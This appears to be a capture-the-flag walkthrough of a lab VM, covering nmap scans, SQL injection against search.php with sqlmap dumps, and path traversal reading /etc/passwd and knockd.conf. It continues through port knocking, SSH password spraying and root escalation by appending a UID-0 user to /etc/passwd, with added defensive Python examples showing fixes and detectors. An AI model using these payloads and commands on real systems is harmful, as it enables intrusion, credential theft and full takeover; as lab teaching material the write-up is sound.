Information gathering
TCP open-port scan
# Nmap 7.93 scan initiated Fri May 3 19:52:13 2024 as: nmap --min-rate 10000 -p- -oA tcp_open_port 192.168.43.170
Nmap scan report for 192.168.43.170
Host is up (0.00073s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp filtered ssh
80/tcp open http
MAC Address: 00:0C:29:4A:C5:3B (VMware)
# Nmap done at Fri May 3 19:52:28 2024 -- 1 IP address (1 host up) scanned in 15.16 seconds
UDP open-port scan
# Nmap 7.93 scan initiated Fri May 3 20:20:36 2024 as: nmap -sU --min-rate 10000 -p- -oA udp_open_port 192.168.43.170
Warning: 192.168.43.170 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.43.170
Host is up (0.00074s latency).
All 65535 scanned ports on 192.168.43.170 are in ignored states.
Not shown: 65457 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)
MAC Address: 00:0C:29:4A:C5:3B (VMware)
# Nmap done at Fri May 3 20:22:01 2024 -- 1 IP address (1 host up) scanned in 85.84 seconds
Service detection on the open TCP ports
# Nmap 7.93 scan initiated Fri May 3 19:53:54 2024 as: nmap -sT -sV -O -p22,80, -oA open_port_service 192.168.43.170
Nmap scan report for 192.168.43.170
Host is up (0.00036s latency).
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd 2.4.38 ((Debian))
MAC Address: 00:0C:29:4A:C5:3B (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=5/3%OT=80%CT=22%CU=38670%PV=Y%DS=1%DC=D%G=Y%M=000C29%T
OS:M=663532E2%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=108%TI=Z%II=I%TS=A
OS:)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B
OS:4ST11NW7%O6=M5B4ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120
OS:)ECN(R=Y%DF=Y%T=40%W=7210%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+
OS:%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
OS:T5(R=N)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%
OS:RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri May 3 19:54:26 2024 -- 1 IP address (1 host up) scanned in 32.04 seconds
Vulnerability script scan of the open TCP services
# Nmap 7.93 scan initiated Fri May 3 19:54:26 2024 as: nmap --script=vuln -p22,80, -oA vuln_scan 192.168.43.170
Nmap scan report for 192.168.43.170
Host is up (0.00054s latency).
PORT STATE SERVICE
22/tcp filtered ssh
80/tcp open http
| http-enum:
| /css/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
|_ /includes/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.43.170
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.43.170:80/manage.php
| Form id:
| Form action: manage.php
|
| Path: http://192.168.43.170:80/search.php
| Form id:
|_ Form action: results.php
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:4A:C5:3B (VMware)
# Nmap done at Fri May 3 19:55:11 2024 -- 1 IP address (1 host up) scanned in 45.18 seconds
From the scan results we can see that traffic to port 22 is filtered. That could be a firewall, or knockd or a similar tool; keep this in mind for later.
Getting a shell
Port 80
Open the site and test the functionality it provides.
display.php lists all employee information and search.php provides a search function. Test search.php for SQL injection: first run a normal query,
then, building on the normal query, test for injection. I used the classic always-true payload Mary' or 1=1 -- +
All records are echoed back,
which proves the page is injectable. Use sqlmap to speed up testing: route the search request through Burp Suite and save the request data to a file.
Enumerate the databases
sqlmap -r search.req --batch --risk=3 --level=5 --dbms=mysql --dbs
Dump the data
sqlmap -r search.req --batch --risk=3 --level=5 --dbms=mysql -D users --dump-all
sqlmap -r search.req --batch --risk=3 --level=5 --dbms=mysql -D Staff --dump-all
Check the current database user's privileges to determine whether files can be read or written
sqlmap -r search.req --batch --risk=3 --level=5 --dbms=mysql --is-dba
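To put the search.php flaw beside its fix, here is an added example (not code from the write-up or the target box) that simulates the search against an in-memory SQLite table of constructed names: the page's own payload Mary' or 1=1 -- + returns every row through the concatenated query and nothing through the parameterized one.

```python
import sqlite3

# Constructed stand-in for the staff table behind search.php (sample names only).
STAFF = [("Mary", "Moe"), ("Alice", "Adams"), ("Bob", "Brown")]

# The always-true payload used against search.php above.
PAYLOAD = "Mary' or 1=1 -- +"


def _db():
    """Fresh in-memory database seeded with the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE staff (firstname TEXT, lastname TEXT)")
    conn.executemany("INSERT INTO staff VALUES (?, ?)", STAFF)
    return conn


def search_vulnerable(term):
    """Mirrors the flaw: the search term is concatenated straight into the SQL text,
    so a quote followed by 'or 1=1' turns the WHERE clause into an always-true test."""
    sql = "SELECT firstname FROM staff WHERE firstname = '%s'" % term
    return [row[0] for row in _db().execute(sql)]


def search_safe(term):
    """Hardened form: the term is bound as a parameter and can only ever be data."""
    sql = "SELECT firstname FROM staff WHERE firstname = ?"
    return [row[0] for row in _db().execute(sql, (term,))]
```
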
Crack the hash on this site:
https://hashes.com/en/decrypt/hash
The plaintext password transorbital1 is recovered; use this credential to log in to manage.php on port 80.
After logging in, the message File does not exist appears at the bottom of the page, which suggests dynamic file inclusion.
Try supplying a parameter to exploit it; the contents of /etc/passwd are displayed.
http://192.168.43.170/welcome.php?file=../../../../../../../etc/passwd
Note: where does the file parameter come from? Purely from experience here: for PHP file inclusion, try file, files, value and filename first; if none of them work, use ffuf or wfuzz with the fuzzDicts wordlists.
Press ctrl+u to view the source, copy the passwd contents into a file, and extract the users with a login shell with the following command:
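As an added example (not part of the original write-up), the allowlist-based resolver below is one way welcome.php's include could be hardened, with a small detector that flags file= values in Apache access-log lines the resolver would reject; the web root, page names and log lines are assumed or constructed.

```python
import os
import re
from urllib.parse import parse_qs, urlsplit

# Assumed web root and allowed page names for the include in welcome.php
# (hypothetical: the real paths on the box are not given on the page).
WEB_ROOT = "/var/www/html"
ALLOWED_PAGES = {"display", "search", "manage", "welcome"}


def resolve_include(file_param):
    """Return the path welcome.php may include, or None if the request is rejected.
    Only bare names from the allowlist pass, so '..' and '/' never reach include()."""
    if file_param is None or "\x00" in file_param:
        return None
    if file_param not in ALLOWED_PAGES:
        return None
    candidate = os.path.normpath(os.path.join(WEB_ROOT, file_param + ".php"))
    # Defence in depth: the resolved path must still sit under the web root.
    if not candidate.startswith(WEB_ROOT + os.sep):
        return None
    return candidate


def flag_traversal(log_lines):
    """Return request targets from Apache access-log lines whose file= value
    would be rejected by resolve_include (traversal, absolute path, unknown page)."""
    hits = []
    for line in log_lines:
        m = re.search(r'"(?:GET|POST) (\S+)', line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        for value in parse_qs(query).get("file", []):   # parse_qs already percent-decodes
            if resolve_include(value) is None:
                hits.append(m.group(1))
    return hits


# Constructed access-log lines: one legitimate page load, one plain traversal,
# one percent-encoded traversal.
LOG = [
    '192.168.43.1 - - [03/May/2024:20:30:01 +0800] "GET /welcome.php?file=display HTTP/1.1" 200 512',
    '192.168.43.1 - - [03/May/2024:20:30:09 +0800] "GET /welcome.php?file=../../../../../../../etc/passwd HTTP/1.1" 200 2048',
    '192.168.43.1 - - [03/May/2024:20:30:15 +0800] "GET /welcome.php?file=%2e%2e/%2e%2e/etc/knockd.conf HTTP/1.1" 200 300',
]
```
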
cat tmp|grep sh$|awk -F':' '{print $1}' >user.txt
Remember that nmap reported port 22 as filtered? Try reading the knockd configuration file /etc/knockd.conf.
It shows [openSSH] sequence = 7469,8475,9842; use the knock tool to knock on the ports:
knock 192.168.43.170 7469 8475 9842
Rescan the open TCP ports with nmap: port 22 has changed to open.
Build a password list from all the passwords obtained through the SQL injection and spray them:
crackmapexec ssh 192.168.43.170 -u user.txt -p password.txt --continue-on-success|grep '+'
Three valid credentials are obtained; log in with each in turn.
Privilege escalation
After logging in as chandlerb and joeyt there is no sensitive information and no privileged command. After logging in as janitor, there is a hidden directory in the home directory containing a password list.
Spray passwords again and obtain a new credential.
Log in as fredf and run
sudo -l
A privileged command exists:
NOPASSWD /opt/devstuff/dist/test/test
The source code is found under /opt/devstuff/.
Its function is to read the contents of a specified file and append them to a target file, so a root-privileged user can be written into /etc/passwd.
Generate the password hash:
openssl passwd -1 1234567
Following the format of the root line in passwd, replace the x with the hash and write the line into /tmp/test1.
Then run
sudo /opt/devstuff/dist/test/test /tmp/test1 /etc/passwd
The new user is appended successfully.
Switch user directly:
su - xiaoliyu
The password is 1234567.
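The technique above leaves a recognizable trace in /etc/passwd. This added audit script (not from the write-up) flags UID-0 accounts other than root and entries that carry a crypt-style hash in the password field instead of x; it runs over a constructed passwd sample whose hash is a placeholder.

```python
import re

# Constructed /etc/passwd content: normal lines plus an appended line of the kind
# the sudo-able append binary can write (the hash value is a placeholder, not real).
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
fredf:x:1003:1003:,,,:/home/fredf:/bin/bash
xiaoliyu:$1$PLACEHOLDER$PLACEHOLDERHASHXXXXXXXXXXX:0:0:root:/root:/bin/bash
"""

# crypt-style hashes start with $<id>$ ($1$ md5, $5$/$6$ sha, $y$ yescrypt ...)
HASH_RE = re.compile(r"^\$[0-9a-z]+\$")


def audit_passwd(text):
    """Return human-readable findings for a passwd file; an empty list means nothing odd."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append("line %d: malformed entry (%d fields)" % (lineno, len(fields)))
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        # Any second UID-0 account is a backdoor root login.
        if uid == "0" and name != "root":
            findings.append("line %d: non-root account %r has UID 0" % (lineno, name))
        # A hash here means the account bypasses /etc/shadow entirely.
        if HASH_RE.match(pw):
            findings.append("line %d: %r carries a password hash in /etc/passwd" % (lineno, name))
        elif pw == "":
            findings.append("line %d: %r has an empty password field" % (lineno, name))
    return findings
```
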